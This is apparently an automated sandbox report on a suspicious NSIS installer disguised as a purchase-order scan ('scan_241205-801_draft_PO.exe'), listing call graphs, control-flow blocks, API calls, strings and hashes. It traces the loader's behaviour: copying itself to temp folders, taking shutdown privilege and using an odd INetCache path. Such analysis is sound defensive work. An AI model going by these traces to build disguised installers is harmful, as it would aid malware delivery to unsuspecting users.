403347 1520->1521 1522 403351 1521->1522 1662 405b6c lstrlenW CharPrevW 1521->1662 1522->1440 1525 40584b 2 API calls 1526 40335f 1525->1526 1665 405dbc 1526->1665 1669 405d8d GetFileAttributesW CreateFileW 1529->1669 1531 402f1d 1551 402f2d 1531->1551 1670 406297 lstrcpynW 1531->1670 1533 402f43 1671 405bb8 lstrlenW 1533->1671 1537 402f54 GetFileSize 1538 403050 1537->1538 1554 402f6b 1537->1554 1676 402e79 1538->1676 1540 403059 1542 403089 GlobalAlloc 1540->1542 1540->1551 1711 403324 SetFilePointer 1540->1711 1687 403324 SetFilePointer 1542->1687 1543 4030bc 1547 402e79 6 API calls 1543->1547 1546 4030a4 1688 403116 1546->1688 1547->1551 1548 403072 1549 40330e ReadFile 1548->1549 1553 40307d 1549->1553 1551->1447 1552 402e79 6 API calls 1552->1554 1553->1542 1553->1551 1554->1538 1554->1543 1554->1551 1554->1552 1708 40330e 1554->1708 1555 4030b0 1555->1551 1555->1555 1556 4030ed SetFilePointer 1555->1556 1556->1551 1558 406671 5 API calls 1557->1558 1559 40399b 1558->1559 1560 4039a1 1559->1560 1561 4039b3 1559->1561 1740 4061de wsprintfW 1560->1740 1562 406165 3 API calls 1561->1562 1563 4039e3 1562->1563 1565 403a02 lstrcatW 1563->1565 1567 406165 3 API calls 1563->1567 1566 4039b1 1565->1566 1732 403c5d 1566->1732 1567->1565 1570 405c74 18 API calls 1571 403a34 1570->1571 1572 403ac8 1571->1572 1575 406165 3 API calls 1571->1575 1573 405c74 18 API calls 1572->1573 1574 403ace 1573->1574 1577 403ade LoadImageW 1574->1577 1578 4062b9 17 API calls 1574->1578 1576 403a66 1575->1576 1576->1572 1581 403a87 lstrlenW 1576->1581 1584 405b99 CharNextW 1576->1584 1579 403b84 1577->1579 1580 403b05 RegisterClassW 1577->1580 1578->1577 1583 40140b 2 API calls 1579->1583 1582 403b3b SystemParametersInfoW CreateWindowExW 1580->1582 1612 403b8e 1580->1612 1585 403a95 lstrcmpiW 1581->1585 1586 403abb 1581->1586 1582->1579 1587 403b8a 1583->1587 1588 403a84 1584->1588 1585->1586 1589 403aa5 GetFileAttributesW 1585->1589 1590 405b6c 3 API calls 1586->1590 1592 403c5d 18 API calls 1587->1592 1587->1612 1588->1581 1591 403ab1 1589->1591 1593 403ac1 1590->1593 1591->1586 1594 405bb8 2 API calls 1591->1594 1595 403b9b 1592->1595 1741 406297 lstrcpynW 1593->1741 1594->1586 1597 403ba7 ShowWindow 1595->1597 1598 403c2a 1595->1598 1600 406601 3 API calls 1597->1600 1742 4053d2 OleInitialize 1598->1742 1601 403bbf 1600->1601 1603 403bcd GetClassInfoW 1601->1603 1606 406601 3 API calls 1601->1606 1602 403c30 1604 403c34 1602->1604 1605 403c4c 1602->1605 1608 403be1 GetClassInfoW RegisterClassW 1603->1608 1609 403bf7 DialogBoxParamW 1603->1609 1611 40140b 2 API calls 1604->1611 1604->1612 1607 40140b 2 API calls 1605->1607 1606->1603 1607->1612 1608->1609 1610 40140b 2 API calls 1609->1610 1610->1612 1611->1612 1612->1450 1613->1454 1750 406297 lstrcpynW 1614->1750 1616 405c85 1751 405c17 CharNextW CharNextW 1616->1751 1619 4036ad 1619->1450 1629 406297 lstrcpynW 1619->1629 1620 40652b 5 API calls 1621 405c9b 1620->1621 1621->1619 1627 405cb2 1621->1627 1622 405ccc lstrlenW 1623 405cd7 1622->1623 1622->1627 1624 405b6c 3 API calls 1623->1624 1626 405cdc GetFileAttributesW 1624->1626 1626->1619 1627->1619 1627->1622 1628 405bb8 2 API calls 1627->1628 1757 4065da FindFirstFileW 1627->1757 1628->1622 1629->1486 1630->1455 1632 4038c5 1631->1632 1633 4038b7 CloseHandle 1631->1633 1760 4038f2 1632->1760 1633->1632 1639 405912 1638->1639 1640 4036ff ExitProcess 1639->1640 1641 405926 MessageBoxIndirectW 1639->1641 1641->1640 1643 406671 5 API calls 1642->1643 1644 40370c lstrcatW 1643->1644 1644->1479 1644->1480 1646 40374e 1645->1646 1647 40581f GetLastError 1645->1647 1646->1492 1647->1646 1648 40582e SetFileSecurityW 1647->1648 1648->1646 1649 405844 GetLastError 1648->1649 1649->1646 1651 40585b 1650->1651 1652 40585f GetLastError 1650->1652 1651->1492 1652->1651 1653->1494 1654->1502 1656 40607e 1655->1656 1657 406071 1655->1657 1656->1502 1816 405ee3 1657->1816 1660 4058b3 CloseHandle 1659->1660 1661 4058bf 1659->1661 1660->1661 1661->1502 1663 403359 1662->1663 1664 405b88 lstrcatW 1662->1664 1663->1525 1664->1663 1666 405dc9 GetTickCount GetTempFileNameW 1665->1666 1667 40336a 1666->1667 1668 405dff 1666->1668 1667->1440 1668->1666 1668->1667 1669->1531 1670->1533 1672 405bc6 1671->1672 1673 402f49 1672->1673 1674 405bcc CharPrevW 1672->1674 1675 406297 lstrcpynW 1673->1675 1674->1672 1674->1673 1675->1537 1677 402e82 1676->1677 1678 402e9a 1676->1678 1681 402e92 1677->1681 1682 402e8b DestroyWindow 1677->1682 1679 402ea2 1678->1679 1680 402eaa GetTickCount 1678->1680 1712 4066ad 1679->1712 1684 402eb8 CreateDialogParamW ShowWindow 1680->1684 1685 402edb 1680->1685 1681->1540 1682->1681 1684->1685 1685->1540 1687->1546 1689 40312f 1688->1689 1690 40315d 1689->1690 1729 403324 SetFilePointer 1689->1729 1692 40330e ReadFile 1690->1692 1693 403168 1692->1693 1694 403291 1693->1694 1695 4032a7 1693->1695 1696 40317a GetTickCount 1693->1696 1694->1555 1697 4032e9 1695->1697 1700 4032ab 1695->1700 1696->1694 1706 4031a6 1696->1706 1698 40330e ReadFile 1697->1698 1698->1694 1699 40330e ReadFile 1699->1706 1700->1694 1701 40330e ReadFile 1700->1701 1702 405e3f WriteFile 1700->1702 1701->1700 1702->1700 1703 4031fc GetTickCount 1703->1706 1704 403221 MulDiv wsprintfW 1716 4052ff 1704->1716 1706->1694 1706->1699 1706->1703 1706->1704 1727 405e3f WriteFile 1706->1727 1730 405e10 ReadFile 1708->1730 1711->1548 1713 4066ca PeekMessageW 1712->1713 1714 4066c0 DispatchMessageW 1713->1714 1715 402ea8 1713->1715 1714->1713 1715->1540 1717 40531a 1716->1717 1726 4053bc 1716->1726 1718 405336 lstrlenW 1717->1718 1721 4062b9 17 API calls 1717->1721 1719 405344 lstrlenW 1718->1719 1720 40535f 1718->1720 1722 405356 lstrcatW 1719->1722 1719->1726 1723 405372 1720->1723 1724 405365 SetWindowTextW 1720->1724 1721->1718 1722->1720 1725 405378 SendMessageW SendMessageW SendMessageW 1723->1725 1723->1726 1724->1723 1725->1726 1726->1706 1728 405e5d 1727->1728 1728->1706 1729->1690 1731 403321 1730->1731 1731->1554 1733 403c71 1732->1733 1749 4061de wsprintfW 1733->1749 1735 403ce2 1736 403d16 18 API calls 1735->1736 1738 403ce7 1736->1738 1737 403a12 1737->1570 1738->1737 1739 4062b9 17 API calls 1738->1739 1739->1738 1740->1566 1741->1572 1743 40425a SendMessageW 1742->1743 1744 4053f5 1743->1744 1747 401389 2 API calls 1744->1747 1748 40541c 1744->1748 1745 40425a SendMessageW 1746 40542e OleUninitialize 1745->1746 1746->1602 1747->1744 1748->1745 1749->1735 1750->1616 1752 405c34 1751->1752 1753 405c46 1751->1753 1752->1753 1754 405c41 CharNextW 1752->1754 1755 405c6a 1753->1755 1756 405b99 CharNextW 1753->1756 1754->1755 1755->1619 1755->1620 1756->1753 1758 4065f0 FindClose 1757->1758 1759 4065fb 1757->1759 1758->1759 1759->1627 1761 403900 1760->1761 1762 4038ca 1761->1762 1763 403905 FreeLibrary GlobalFree 1761->1763 1764 4059a9 1762->1764 1763->1762 1763->1763 1765 405c74 18 API calls 1764->1765 1766 4059c9 1765->1766 1767 4059d1 DeleteFileW 1766->1767 1768 4059e8 1766->1768 1769 4036e0 OleUninitialize 1767->1769 1770 405b08 1768->1770 1803 406297 lstrcpynW 1768->1803 1769->1461 1769->1462 1770->1769 1775 405b27 1770->1775 1772 405a0e 1773 405a21 1772->1773 1774 405a14 lstrcatW 1772->1774 1777 405bb8 2 API calls 1773->1777 1776 405a27 1774->1776 1778 4065da 2 API calls 1775->1778 1780 405a37 lstrcatW 1776->1780 1781 405a42 lstrlenW FindFirstFileW 1776->1781 1777->1776 1779 405b2d 1778->1779 1779->1769 1782 405b6c 3 API calls 1779->1782 1780->1781 1781->1770 1795 405a64 1781->1795 1783 405b37 1782->1783 1785 405961 5 API calls 1783->1785 1784 405aeb FindNextFileW 1788 405b01 FindClose 1784->1788 1784->1795 1787 405b43 1785->1787 1789 405b47 1787->1789 1790 405b5d 1787->1790 1788->1770 1789->1769 1793 4052ff 24 API calls 1789->1793 1792 4052ff 24 API calls 1790->1792 1792->1769 1796 405b54 1793->1796 1794 4059a9 60 API calls 1797 405ab5 1794->1797 1795->1784 1795->1794 1795->1797 1804 406297 lstrcpynW 1795->1804 1805 405961 1795->1805 1799 40605d 36 API calls 1796->1799 1797->1784 1798 4052ff 24 API calls 1797->1798 1800 4052ff 24 API calls 1797->1800 1802 40605d 36 API calls 1797->1802 1798->1784 1801 405b5b 1799->1801 1800->1797 1801->1769 1802->1797 1803->1772 1804->1795 1813 405d68 GetFileAttributesW 1805->1813 1808 40598e 1808->1795 1809 405984 DeleteFileW 1811 40598a 1809->1811 1810 40597c RemoveDirectoryW 1810->1811 1811->1808 1812 40599a SetFileAttributesW 1811->1812 1812->1808 1814 40596d 1813->1814 1815 405d7a SetFileAttributesW 1813->1815 1814->1808 1814->1809 1814->1810 1815->1814 1817 405f13 1816->1817 1818 405f39 GetShortPathNameW 1816->1818 1843 405d8d GetFileAttributesW CreateFileW 1817->1843 1820 406058 1818->1820 1821 405f4e 1818->1821 1820->1656 1821->1820 1823 405f56 wsprintfA 1821->1823 1822 405f1d CloseHandle GetShortPathNameW 1822->1820 1824 405f31 1822->1824 1825 4062b9 17 API calls 1823->1825 1824->1818 1824->1820 1826 405f7e 1825->1826 1844 405d8d GetFileAttributesW CreateFileW 1826->1844 1828 405f8b 1828->1820 1829 405f9a GetFileSize GlobalAlloc 1828->1829 1830 406051 CloseHandle 1829->1830 1831 405fbc 1829->1831 1830->1820 1832 405e10 ReadFile 1831->1832 1833 405fc4 1832->1833 1833->1830 1845 405cf2 lstrlenA 1833->1845 1836 405fdb lstrcpyA 1839 405ffd 1836->1839 1837 405fef 1838 405cf2 4 API calls 1837->1838 1838->1839 1840 406034 SetFilePointer 1839->1840 1841 405e3f WriteFile 1840->1841 1842 40604a GlobalFree 1841->1842 1842->1830 1843->1822 1844->1828 1846 405d33 lstrlenA 1845->1846 1847 405d0c lstrcmpiA 1846->1847 1849 405d3b 1846->1849 1848 405d2a CharNextA 1847->1848 1847->1849 1848->1846 1849->1836 1849->1837

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_00407242 1 Function_00404243 2 Function_00405D48 3 Function_0040584B 4 Function_004057CE 5 Function_004067D2 25 Function_0040696F 5->25 54 Function_00406827 5->54 6 Function_004053D2 8 Function_0040425A 6->8 40 Function_00401389 6->40 7 Function_004038D7 9 Function_004065DA 10 Function_00402EDD 10->2 17 Function_00406764 10->17 33 Function_00402E79 10->33 43 Function_00405D8D 10->43 44 Function_0040330E 10->44 47 Function_00403116 10->47 49 Function_00406297 10->49 52 Function_00403324 10->52 63 Function_00405BB8 10->63 11 Function_0040605D 16 Function_00405EE3 11->16 12 Function_00403C5D 13 Function_004061DE 12->13 32 Function_004061F7 12->32 48 Function_00403D16 12->48 64 Function_004062B9 12->64 14 Function_00405961 20 Function_00405D68 14->20 15 Function_00405BE3 16->2 28 Function_00405CF2 16->28 16->43 46 Function_00405E10 16->46 16->64 67 Function_00405E3F 16->67 18 Function_00406165 38 Function_00406104 18->38 19 Function_004041E7 21 Function_00405868 26 Function_00406671 21->26 22 Function_0040336C 22->3 22->4 22->10 22->11 22->21 22->26 30 Function_00405C74 22->30 34 Function_004058FD 22->34 36 Function_00405880 22->36 37 Function_00406601 22->37 39 Function_00403987 22->39 42 Function_0040140B 22->42 22->49 51 Function_00405B99 22->51 59 Function_004038AD 22->59 22->64 65 Function_0040333B 22->65 23 Function_00405B6C 24 Function_0040136D 24->32 25->0 53 Function_004072A7 25->53 55 Function_00407328 25->55 26->37 27 Function_004038F2 27->7 29 Function_00402DF3 30->9 30->23 30->49 50 Function_00405C17 30->50 57 Function_0040652B 30->57 30->63 31 Function_00404275 58 Function_004066AD 33->58 35 Function_004052FF 35->64 41 Function_00406089 38->41 39->6 39->7 39->12 39->13 39->18 39->23 39->26 39->30 39->37 39->42 39->49 39->51 39->63 39->64 40->24 61 Function_00401434 40->61 42->40 44->46 45 Function_0040420E 45->64 47->5 47->35 47->44 47->52 47->67 48->64 50->51 56 Function_004059A9 56->9 56->11 56->14 56->23 56->30 56->35 56->49 56->56 56->63 57->2 57->15 57->51 59->27 59->56 60 Function_00404230 62 Function_00403D35 62->1 62->8 62->19 62->31 62->40 62->42 62->45 62->48 62->49 62->60 62->64 64->13 64->18 64->49 64->57 64->64 65->3 65->15 65->23 65->57 66 Function_00405DBC 65->66

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 8 4033b5 1->8 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 8->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 22 4033fd 17->22 22->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 31 403495-40349a 28->31 32 40349c-4034a0 28->32 36 403610-40362a DeleteFileW call 402edd 29->36 37 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->37 31->31 31->32 34 4034a2-4034a6 32->34 35 4034a7-4034ab 32->35 34->35 38 4034b1-4034b7 35->38 39 40356a-403577 call 405b99 35->39 57 403630-403636 36->57 58 4036db-4036eb call 4038ad OleUninitialize 36->58 37->36 54 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 37->54 43 4034d2-40350b 38->43 44 4034b9-4034c1 38->44 55 403579-40357a 39->55 56 40357b-403581 39->56 45 403528-403562 43->45 46 40350d-403512 43->46 50 4034c3-4034c6 44->50 51 4034c8 44->51 45->39 53 403564-403568 45->53 46->45 52 403514-40351c 46->52 50->43 50->51 51->43 60 403523 52->60 61 40351e-403521 52->61 53->39 62 403589-403597 call 406297 53->62 54->36 54->58 55->56 56->28 64 403587 56->64 65 4036cb-4036d2 call 403987 57->65 66 40363c-403647 call 405b99 57->66 73 403811-403817 58->73 74 4036f1-403701 call 4058fd ExitProcess 58->74 60->45 61->45 61->60 69 40359c 62->69 64->69 76 4036d7 65->76 80 403695-40369f 66->80 81 403649-40367e 66->81 69->29 78 403895-40389d 73->78 79 403819-40382f GetCurrentProcess OpenProcessToken 73->79 76->58 83 4038a3-4038a7 ExitProcess 78->83 84 40389f 78->84 88 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 79->88 89 403865-403873 call 406671 79->89 86 4036a1-4036af call 405c74 80->86 87 403707-40371b call 405868 lstrcatW 80->87 82 403680-403684 81->82 90 403686-40368b 82->90 91 40368d-403691 82->91 84->83 86->58 99 4036b1-4036c7 call 406297 * 2 86->99 100 403728-403742 lstrcatW lstrcmpiW 87->100 101 40371d-403723 lstrcatW 87->101 88->89 102 403881-40388c ExitWindowsEx 89->102 103 403875-40387f 89->103 90->91 95 403693 90->95 91->82 91->95 95->80 99->65 100->58 106 403744-403747 100->106 101->100 102->78 104 40388e-403890 call 40140b 102->104 103->102 103->104 104->78 109 403750 call 40584b 106->109 110 403749-40374e call 4057ce 106->110 115 403755-403763 SetCurrentDirectoryW 109->115 110->115 118 403770-403799 call 406297 115->118 119 403765-40376b call 406297 115->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 128 403805-40380c call 40605d 126->128 127->126 129 4037ce-4037ee call 40605d call 4062b9 call 405880 127->129 128->58 129->126 138 4037f0-4037f7 CloseHandle 129->138 138->126
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE ref: 0040338F
                                                                                • GetVersion.KERNEL32 ref: 00403395
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                                • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                                • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                                • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000020,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                                  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                                • ExitProcess.KERNEL32 ref: 00403701
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                                • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                                • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                                • ExitProcess.KERNEL32 ref: 004038A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenes\Bioassayed$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenes\Bioassayed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\scan_241205-801_draft_PO.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 3441113951-2345347353
                                                                                • Opcode ID: dda274d8e7493245a05eda2802463c446b3f5d50a8ccf16e7491acea9e83a5fc
                                                                                • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                                • Opcode Fuzzy Hash: dda274d8e7493245a05eda2802463c446b3f5d50a8ccf16e7491acea9e83a5fc
                                                                                • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 139 403d35-403d47 140 403e88-403e97 139->140 141 403d4d-403d53 139->141 143 403ee6-403efb 140->143 144 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 140->144 141->140 142 403d59-403d62 141->142 147 403d64-403d71 SetWindowPos 142->147 148 403d77-403d7a 142->148 145 403f3b-403f40 call 40425a 143->145 146 403efd-403f00 143->146 144->143 161 403f45-403f60 145->161 150 403f02-403f0d call 401389 146->150 151 403f33-403f35 146->151 147->148 153 403d94-403d9a 148->153 154 403d7c-403d8e ShowWindow 148->154 150->151 172 403f0f-403f2e SendMessageW 150->172 151->145 160 4041db 151->160 156 403db6-403db9 153->156 157 403d9c-403db1 DestroyWindow 153->157 154->153 165 403dbb-403dc7 SetWindowLongW 156->165 166 403dcc-403dd2 156->166 162 4041b8-4041be 157->162 164 4041dd-4041e4 160->164 168 403f62-403f64 call 40140b 161->168 169 403f69-403f6f 161->169 162->160 174 4041c0-4041c6 162->174 165->164 170 403e75-403e83 call 404275 166->170 171 403dd8-403de9 GetDlgItem 166->171 168->169 175 403f75-403f80 169->175 176 404199-4041b2 DestroyWindow EndDialog 169->176 170->164 178 403e08-403e0b 171->178 179 403deb-403e02 SendMessageW IsWindowEnabled 171->179 172->164 174->160 181 4041c8-4041d1 ShowWindow 174->181 175->176 177 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 175->177 176->162 209 403fd5-403fda 177->209 210 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 177->210 183 403e10-403e13 178->183 184 403e0d-403e0e 178->184 179->160 179->178 181->160 188 403e21-403e26 183->188 189 403e15-403e1b 183->189 187 403e3e-403e43 call 4041e7 184->187 187->170 192 403e5c-403e6f SendMessageW 188->192 194 403e28-403e2e 188->194 189->192 193 403e1d-403e1f 189->193 192->170 193->187 197 403e30-403e36 call 40140b 194->197 198 403e45-403e4e call 40140b 194->198 205 403e3c 197->205 198->170 207 403e50-403e5a 198->207 205->187 207->205 209->210 213 40401b-40401c 210->213 214 40401e 210->214 215 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404050-404061 SendMessageW 215->216 217 404063 215->217 218 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 216->218 217->218 218->161 229 4040ae-4040b0 218->229 229->161 230 4040b6-4040ba 229->230 231 4040d9-4040ed DestroyWindow 230->231 232 4040bc-4040c2 230->232 231->162 234 4040f3-404120 CreateDialogParamW 231->234 232->160 233 4040c8-4040ce 232->233 233->161 235 4040d4 233->235 234->162 236 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 40417f-404192 ShowWindow call 40425a 236->241 243 404197 241->243 243->162
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                • ShowWindow.USER32(?), ref: 00403D8E
                                                                                • DestroyWindow.USER32 ref: 00403DA2
                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                                • EnableWindow.USER32(?,?), ref: 00404011
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                                • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
